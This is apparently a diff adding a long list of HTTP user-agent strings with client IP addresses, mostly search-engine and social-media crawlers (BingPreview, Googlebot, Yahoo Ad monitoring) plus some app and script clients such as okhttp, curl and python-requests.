    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.250]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.134]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.185]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.240]
    +okhttp/3.11.0 [ip:151.46.95.93]
    +okhttp/3.11.0 [ip:93.36.30.54]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.120]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.98]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.40]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.220]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.181]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.164]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.185]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.147]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.227]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.82]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.184]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.16]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.16]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.58]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.78]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.49]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.139]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.10]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.167]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.206]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.111]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.103]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.132]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.177]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.194]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.54]
    +okhttp/4.8.1 [ip:213.32.4.224]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.89]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.179]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.8]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.122]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.165]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.20]
    +okhttp/3.11.0 [ip:95.74.84.124]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.77]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.199]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.88]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.220]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.112]
    +okhttp/3.11.0 [ip:151.82.154.189]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.7]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.51]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.65.181]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.6]
    +okhttp/3.12.5 [ip:5.179.153.231]
    +facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php) [ip:213.32.4.224]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.24]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.29]
    +okhttp/3.11.0 [ip:37.160.159.171]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.31]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.174]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.144]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.142]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.80]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.88]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.244]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.110]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.131]
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 PTST/201112.191139 [ip:35.233.190.247]
    +okhttp/3.12.5 [ip:79.50.233.138]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.232]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.177]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.43]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.83]
    +SmallProxy 3.5.4
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.72]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.158]
    +facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php) [ip:213.32.4.81]
    +facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php) [ip:213.32.4.95]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.172]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.25]
    +SmallProxy 3.4.12 Free
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.31]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.19]
    +Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Wireless Transcoder) Version/3.1 Safari/525.13
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.212]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.174]
    +12345 MRA 5.4 (build 02647);
    +okhttp/3.12.5 [ip:151.45.106.28]
    +CRAZYWEBCRAWLER 0.9.7, http://www.crazywebcrawler.com
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.60]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.110]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.154]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.17]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.181]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.231]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.202.171]
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/85.0.4183.140 Mobile Safari/537.36 [ip:66.249.90.94]
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/85.0.4183.140 Mobile Safari/537.36 [ip:66.249.90.92]
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/86.0.4240.96 Mobile Safari/537.36 [ip:66.249.90.94]
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/86.0.4240.96 Mobile Safari/537.36 [ip:66.249.90.92]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.159]
    +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268 [ip:5.45.207.163]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.164]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.21]
    +okhttp/3.12.5 [ip:151.37.9.134]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.89]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.216]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.4]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.210]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.196]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.254]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.88]
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 8.0.0; DLI-TL20 ) U2/1.0.0 Mobile
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 6.0.1; SM-C111 ) U2/1.0.0 Mobile
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.1.1138 (SpeedMode; Proxy; Android 8.1.0; SM-J330G ) U2/1.0.0 Mobile
    +WhatsApp/2.20.206.11 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605551739-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605570910-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605488342-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605488357-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605488318-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605488326-0
    +CatchBot/1.0; +http://www.catchbot.com
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.188]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.14]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.56]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.90]
    +WhatsApp/2.20.205.15 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605539350-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605539351-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605539352-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605551727-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605570899-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605570900-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605564616-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605564676-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605564615-60
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605564614-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605564676-10
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/W.X.Y.Z\xE2\x80\xA1 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.0]
    +AppEngine-Google; (+http://code.google.com/appengine; appid: s~pipe-295708)
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.125]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.250]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.30]
    +facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php) [ip:213.32.4.115]
    +curl/7.36.0 [ip:87.0.35.53]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.16]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.139.56]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.74]
    +okhttp/3.11.0 [ip:79.31.157.239]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.50]
    +okhttp/3.11.0 [ip:176.200.52.10]
    +curl/7.64.1 [ip:88.20.2.63]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.94]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.99]
    +okhttp/3.12.5 [ip:151.18.213.138]
    +python-requests/2.18.4 [ip:213.32.4.211]
    +okhttp/3.12.5 [ip:80.215.2.56]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.23]
    +okhttp/3.11.0 [ip:37.161.183.40]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.140]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.229]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.228]
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Mobile Safari/537.36 PTST/201112.191139 [ip:208.70.31.93]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.25]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.212]
    +WordPress.com; https://blog.logrocket.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605651278-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 7.1.1; SM-J330G ) U2/1.0.0 Mobile
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.2.1113 (SpeedMode; Proxy; Android 6.0; Micromax_Q4101 ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605583276-10
    +okhttp/3.12.5 [ip:200.44.237.157]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605596683-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1605575490-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605596673-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605596680-0
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.247]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605651076-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605651079-0
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.160]
    +okhttp/3.11.0 [ip:93.36.30.156]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.26]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.64]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.108]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.205]
    +okhttp/3.12.5 [ip:31.26.168.235]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.79]
    +okhttp/3.11.0 [ip:37.160.35.116]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.193]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.136]
    +AdsBot-Google (+http://www.google.com/adsbot.html) [ip:66.249.90.92]
    +AdsBot-Google (+http://www.google.com/adsbot.html) [ip:66.249.90.93]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.1]
    +okhttp/3.12.5 [ip:37.119.235.10]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.63]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.117]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.11]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.241]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.55]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.26]
    +okhttp/3.12.5 [ip:217.171.72.102]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.199]
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Mobile Safari/537.36 PTST/201112.191139 [ip:35.233.190.247]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.225]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.22]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.202]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.21]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.20]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.71]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.140]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.156]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.149]
